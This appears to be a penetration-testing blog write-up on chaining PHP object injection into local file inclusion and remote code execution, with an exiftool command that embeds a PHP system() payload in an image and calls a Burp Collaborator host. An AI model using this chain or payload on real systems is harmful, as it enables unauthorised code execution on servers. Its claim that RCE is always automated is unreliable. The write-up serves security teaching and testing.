PHP Object Injection

Chain Vulnerability (LFI to RCE)

Hello everyone, hope you are doing well and taking care of your health in this pandemic situation. Today I am gonna take you to the chain of vulnerabilities.

Recently I performed pen-testing on web applications found interesting chains of vulnerabilities.

Which include LFI(Local File Inclusion) to RCE(Remote Code Execution).

Let's take a quick revision of what is LFI and RCE.

What is LFI(Local File Inclusion)?

LFI is a web vulnerability caused by mistakes made by a programmer of a website or web application. If an LFI vulnerability exists in a website or web application, an attacker can include malicious files that are later run by this website or web application.

Risk

LFI can be dangerous, especially if combined with other vulnerabilities — for example, if the attacker is able to upload malicious files to the server. Even if the attacker cannot upload files, they can use the LFI vulnerability together with a directory traversal vulnerability to access sensitive information.

What is RCE (Remote Code Execution)

Remote code execution is always performed by an automated tool. Attempting to manually remotely execute code would be at the very best near impossible. These attacks are typically written into an automated script.

Risk

Remote arbitrary code execution is most often aimed at giving a remote user administrative access to a vulnerable system. The attack is usually prefaced by an information gathering attack, in which the attacker uses some means such as an automated scanning tool to identify the vulnerable version of the software. Once identified, the attacker executes the script against the program with hopes of gaining local administrative access to the host.

Let’s go to our attack scenario.

Attack Scenario

When analyzing the page I found that parameter passing in URL

Encode and decode base 64 data

When decoding the data with base64, found it was serialized.

how to identify whether it is serialized or deserialize?

As shown in the below figure,

O — stands for object

8 — stands for the length of object

s — stands for strings

8 — stands for the length of strings

deserialize objects

Modified the upper data where object = IncludeFile and string = /etc/passwd.

modified data with LFI and encoded with base 64

YEAH!!!! we successfully get lead to LFI.

Leads to LFI (local file inclusion)

Now, as per restriction while uploading files we have seen the scenario where it will only allow uploading image files like jpeg, jpg, png, and many more.

In that scenario, we will use ExifTool which helps to create a payload in the image.

To install the tool, I have used the Linux platform simply install with the below command:

sudo apt-get install exiftool

Once installed we can use any image to enter our payload

To enter our payload in our image simply copy the file into the ExifTool directory. Run the below commands:

./exiftool -Comments=’<?PHP system(“nslookup “xxxxxxxxx.burpcollaboartor.net”);?>’ “imagename.png”

Here, I am using the Burp Collaborator client which is a tool for making use of the Burp Collaborator during manual testing. You can use the Collaborator client to generate payloads for use in manual testing, and poll the Collaborator server for any network interactions that result from using those payloads.

generating payload in image

Once our payload is ready upload it.

uploading image file

Once the file uploaded, modified the data where object = IncludeFile and string = Path for the uploaded image

giving the path of uploading an image

Then after uploading the file we will click on the poll now button on the burp collaborator

DNS call which means our exploitation is successful

Thank You!!! For spending your precious time and reading the article.

Stay tuned for more attacks.